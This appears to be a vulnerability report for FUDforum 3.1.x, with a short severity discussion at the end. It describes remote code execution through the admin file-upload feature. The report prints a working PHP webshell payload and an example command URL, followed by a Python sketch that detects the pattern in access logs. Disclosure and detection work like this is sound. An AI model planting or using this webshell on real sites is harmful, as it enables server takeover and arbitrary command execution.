Remote code execution with File Administration System feature in Admin Control Panel Site
Affected Version: 3.1.0
Demo installation: https://localhost/FUDforum-3.1.2/
Steps to reproduce the bug:
1 : Go to http://localhost/FUDforum-3.1.2/ and log in with an admin account
2 : Go to the Admin Control Panel and access http://localhost/FUDforum-3.1.2/adm/admbrowse.php?&SQ=59a844c7073e3a8d98026d324884a119
3 : Use the "File to upload" feature in the File Administration System to upload a PHP webshell to the webroot directory

WebShell payload:
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

4 : Access the webshell and get remote code execution.

Example : http://localhost/FUDforum-3.1.2/2test1.php?cmd=ls%20-la
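A detection sketch for the sequence reported above, added here as an example and not part of the original issue or of FUDforum: it scans a web access log for a POST to `adm/admbrowse.php` followed by a successful request to a `.php` file that is not part of the installation. The log format (Apache-style), the log lines, the `KNOWN_SCRIPTS` manifest and the function name are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache-style), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2022:10:00:01 +0000] "GET /FUDforum-3.1.2/index.php?t=login HTTP/1.1" 200 5120
203.0.113.7 - - [10/Jan/2022:10:01:12 +0000] "POST /FUDforum-3.1.2/adm/admbrowse.php?&SQ=PLACEHOLDER HTTP/1.1" 200 8342
203.0.113.7 - - [10/Jan/2022:10:01:40 +0000] "GET /FUDforum-3.1.2/2test1.php?cmd=ls%20-la HTTP/1.1" 200 911
198.51.100.4 - - [10/Jan/2022:10:02:03 +0000] "GET /FUDforum-3.1.2/index.php?t=search&cmd=x HTTP/1.1" 200 4000
"""

# Assumption: scripts shipped with the installation, e.g. taken from a file manifest.
KNOWN_SCRIPTS = {"/FUDforum-3.1.2/index.php", "/FUDforum-3.1.2/adm/admbrowse.php"}
UPLOAD_ENDPOINT = "/adm/admbrowse.php"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def find_suspect_requests(log_text, known_scripts=KNOWN_SCRIPTS):
    """Return 200-status hits on unknown .php files seen after a file-manager POST."""
    findings, upload_seen = [], False
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not parse
        ip, ts, method, target, status = m.groups()
        url = urlsplit(target)
        if method == "POST" and url.path.endswith(UPLOAD_ENDPOINT):
            upload_seen = True  # something was submitted to the file manager
            continue
        if not upload_seen or not url.path.lower().endswith(".php"):
            continue
        if url.path in known_scripts or status != "200":
            continue
        # A 'cmd' parameter on an unknown script matches the reported pattern.
        params = parse_qs(url.query, keep_blank_values=True)
        findings.append({"ip": ip, "time": ts, "path": url.path,
                         "cmd": params.get("cmd", [None])[0]})
    return findings


if __name__ == "__main__":
    for finding in find_suspect_requests(SAMPLE_LOG):
        print(finding)
```

Requests to known scripts are ignored even when they carry a `cmd` parameter, so the manifest has to be kept in step with the deployed files.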
Confirm that is Critical impact!
It needs to be fixed, but it's not critical, as it requires admin access.
Agree with u